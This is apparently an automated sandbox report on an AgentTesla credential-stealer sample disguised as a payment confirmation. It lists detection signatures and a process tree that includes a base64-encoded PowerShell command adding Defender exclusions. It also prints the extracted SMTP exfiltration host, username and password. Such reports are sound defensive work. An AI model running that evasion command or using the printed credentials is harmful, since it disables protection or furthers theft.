Windows
Analysis Report
payment confirmation.exe
Overview
General Information
Detection
AgentTesla
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Drops PE files to the document folder of the user
Drops VBS files to the startup folder
Encrypted powershell cmdline option found
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Classification
- System is w10x64
payment confirmation.exe (PID: 8060 cmdline:
"C:\Users\ user\Deskt op\payment confirmat ion.exe" MD5: 8AF59F00C8440AF37F21D273C284B0D1) cmd.exe (PID: 7836 cmdline:
"C:\Window s\System32 \cmd.exe" /c ipconfi g /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 2148 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) ipconfig.exe (PID: 5044 cmdline:
ipconfig / release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB) powershell.exe (PID: 2412 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -enc QQBkA GQALQBNAHA AUAByAGUAZ gBlAHIAZQB uAGMAZQAgA C0ARQB4AGM AbAB1AHMAa QBvAG4AUAB hAHQAaAAgA EMAOgBcAFU AcwBlAHIAc wBcAGoAbwB uAGUAcwBcA EQAZQBzAGs AdABvAHAAX ABwAGEAeQB tAGUAbgB0A CAAYwBvAG4 AZgBpAHIAb QBhAHQAaQB vAG4ALgBlA HgAZQA7ACA AQQBkAGQAL QBNAHAAUAB yAGUAZgBlA HIAZQBuAGM AZQAgAC0AR QB4AGMAbAB 1AHMAaQBvA G4AUAByAG8 AYwBlAHMAc wAgAEMAOgB cAFUAcwBlA HIAcwBcAGo AbwBuAGUAc wBcAEQAZQB zAGsAdABvA HAAXABwAGE AeQBtAGUAb gB0ACAAYwB vAG4AZgBpA HIAbQBhAHQ AaQBvAG4AL gBlAHgAZQA 7AEEAZABkA C0ATQBwAFA AcgBlAGYAZ QByAGUAbgB jAGUAIAAtA EUAeABjAGw AdQBzAGkAb wBuAFAAYQB 0AGgAIABDA DoAXABVAHM AZQByAHMAX ABqAG8AbgB lAHMAXABkA G8AYwB1AG0 AZQBuAHQAc wBcAG8AYQB nAGUALgBlA HgAZQA7ACA AQQBkAGQAL QBNAHAAUAB yAGUAZgBlA HIAZQBuAGM AZQAgAC0AR QB4AGMAbAB 1AHMAaQBvA G4AUAByAG8 AYwBlAHMAc wAgAEMAOgB cAFUAcwBlA HIAcwBcAGo AbwBuAGUAc wBcAGQAbwB jAHUAbQBlA G4AdABzAFw AbwBhAGcAZ QAuAGUAeAB lAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) conhost.exe (PID: 4536 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) WmiPrvSE.exe (PID: 4756 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) InstallUtil.exe (PID: 1432 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Ins tallUtil.e xe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57) cmd.exe (PID: 5540 cmdline:
"C:\Window s\System32 \cmd.exe" /c ipconfi g /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 872 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) ipconfig.exe (PID: 1628 cmdline:
ipconfig / renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
wscript.exe (PID: 2936 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\Micro soft\Windo ws\Start M enu\Progra ms\Startup \oage.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) oage.exe (PID: 5176 cmdline:
"C:\Users\ user\Docum ents\oage. exe" MD5: 8AF59F00C8440AF37F21D273C284B0D1) cmd.exe (PID: 2348 cmdline:
"C:\Window s\System32 \cmd.exe" /c ipconfi g /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 1920 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) ipconfig.exe (PID: 2176 cmdline:
ipconfig / release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB) InstallUtil.exe (PID: 2260 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Ins tallUtil.e xe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57) cmd.exe (PID: 3884 cmdline:
"C:\Window s\System32 \cmd.exe" /c ipconfi g /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 2988 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) ipconfig.exe (PID: 4396 cmdline:
ipconfig / renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
{"Exfil Mode": "SMTP", "Host": "mail.iaa-airferight.com", "Username": "admin@iaa-airferight.com", "Password": "manlikeyou88"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
Click to see the 15 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
System Summary |
---|
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |